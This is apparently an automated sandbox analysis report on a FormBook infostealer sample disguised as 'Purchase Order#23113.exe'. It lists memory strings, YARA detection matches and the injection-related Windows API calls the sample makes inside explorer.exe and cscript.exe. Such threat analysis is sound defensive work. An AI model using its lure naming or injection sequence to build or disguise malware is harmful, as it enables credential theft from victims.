          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106694802.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4205364181.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000003.00000003.3106694802.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4205364181.0000000009702000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000003.00000002.4202743547.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1775351799.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000003.00000002.4202743547.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1775351799.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000003.00000000.1780447138.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4208251758.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000003.00000002.4202743547.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1775351799.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 00000003.00000000.1780447138.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4208251758.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000003.00000000.1780447138.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4208251758.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000003.00000002.4208251758.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1780447138.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000003.00000000.1780447138.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4208251758.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: Purchase Order#23113.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
          Source: explorer.exe, 00000003.00000002.4210627105.000000001157F000.00000004.80000000.00040000.00000000.sdmp, cscript.exe, 00000004.00000002.4201113951.000000000590F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1775351799.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000003.00000000.1775351799.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.Purchase Order#23113.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Purchase Order#23113.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.Purchase Order#23113.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.Purchase Order#23113.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Purchase Order#23113.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Purchase Order#23113.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.Purchase Order#23113.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Purchase Order#23113.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4209826259.000000000E656000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: Process Memory Space: Purchase Order#23113.exe PID: 6564, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: Purchase Order#23113.exe PID: 6636, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: cscript.exe PID: 1068, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          .NET source code contains very large array initializations
          Source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, -Module-.csLarge array initialization: _200E_200E_206B_200B_206D_200F_200F_200C_200E_202B_202C_200D_200F_202C_202E_202B_206F_206D_202E_200B_202D_206B_202E_202C_202C_202B_206A_206C_202A_206B_200D_202C_202B_202B_206E_206E_206C_206E_206C_206F_202E: array initializer size 2976
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: Purchase Order#23113.exe
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041A360 NtCreateFile,2_2_0041A360
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041A410 NtReadFile,2_2_0041A410
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041A490 NtClose,2_2_0041A490
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041A540 NtAllocateVirtualMemory,2_2_0041A540
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041A35C NtCreateFile,2_2_0041A35C
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041A40B NtReadFile,2_2_0041A40B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041A53A NtAllocateVirtualMemory,2_2_0041A53A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772B60 NtClose,LdrInitializeThunk,2_2_01772B60
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772BF0 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01772BF0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772AD0 NtReadFile,LdrInitializeThunk,2_2_01772AD0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772D30 NtUnmapViewOfSection,LdrInitializeThunk,2_2_01772D30
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772D10 NtMapViewOfSection,LdrInitializeThunk,2_2_01772D10
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01772DF0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772DD0 NtDelayExecution,LdrInitializeThunk,2_2_01772DD0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01772C70
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772CA0 NtQueryInformationToken,LdrInitializeThunk,2_2_01772CA0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772F30 NtCreateSection,LdrInitializeThunk,2_2_01772F30
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772FE0 NtCreateFile,LdrInitializeThunk,2_2_01772FE0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772FB0 NtResumeThread,LdrInitializeThunk,2_2_01772FB0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772F90 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01772F90
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01772EA0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772E80 NtReadVirtualMemory,LdrInitializeThunk,2_2_01772E80
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01774340 NtSetContextThread,2_2_01774340
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01774650 NtSuspendThread,2_2_01774650
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772BE0 NtQueryValueKey,2_2_01772BE0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772BA0 NtEnumerateValueKey,2_2_01772BA0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772B80 NtQueryInformationFile,2_2_01772B80
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772AF0 NtWriteFile,2_2_01772AF0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772AB0 NtWaitForSingleObject,2_2_01772AB0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772D00 NtSetInformationFile,2_2_01772D00
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772DB0 NtEnumerateKey,2_2_01772DB0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772C60 NtCreateKey,2_2_01772C60
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772C00 NtQueryInformationProcess,2_2_01772C00
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772CF0 NtOpenProcess,2_2_01772CF0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772CC0 NtQueryVirtualMemory,2_2_01772CC0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772F60 NtCreateProcessEx,2_2_01772F60
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772FA0 NtQuerySection,2_2_01772FA0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772E30 NtWriteVirtualMemory,2_2_01772E30
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01772EE0 NtQueueApcThread,2_2_01772EE0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01773010 NtOpenDirectoryObject,2_2_01773010
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01773090 NtSetValueKey,2_2_01773090
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017735C0 NtCreateMutant,2_2_017735C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017739B0 NtGetContextThread,2_2_017739B0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01773D70 NtOpenThread,2_2_01773D70
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01773D10 NtOpenProcessToken,2_2_01773D10
          Source: C:\Windows\explorer.exeCode function: 3_2_0E63E232 NtCreateFile,3_2_0E63E232
          Source: C:\Windows\explorer.exeCode function: 3_2_0E63FE12 NtProtectVirtualMemory,3_2_0E63FE12
          Source: C:\Windows\explorer.exeCode function: 3_2_0E63FE0A NtProtectVirtualMemory,3_2_0E63FE0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_04F42CA0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04F42C70
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42C60 NtCreateKey,LdrInitializeThunk,4_2_04F42C60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_04F42DF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42DD0 NtDelayExecution,LdrInitializeThunk,4_2_04F42DD0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42D10 NtMapViewOfSection,LdrInitializeThunk,4_2_04F42D10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_04F42EA0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42FE0 NtCreateFile,LdrInitializeThunk,4_2_04F42FE0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42F30 NtCreateSection,LdrInitializeThunk,4_2_04F42F30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42AD0 NtReadFile,LdrInitializeThunk,4_2_04F42AD0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04F42BF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42BE0 NtQueryValueKey,LdrInitializeThunk,4_2_04F42BE0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42B60 NtClose,LdrInitializeThunk,4_2_04F42B60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F435C0 NtCreateMutant,LdrInitializeThunk,4_2_04F435C0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F44650 NtSuspendThread,4_2_04F44650
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F44340 NtSetContextThread,4_2_04F44340
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42CF0 NtOpenProcess,4_2_04F42CF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42CC0 NtQueryVirtualMemory,4_2_04F42CC0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42C00 NtQueryInformationProcess,4_2_04F42C00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42DB0 NtEnumerateKey,4_2_04F42DB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F42D30 NtUnmapViewOfSection,4_2_04F42D30
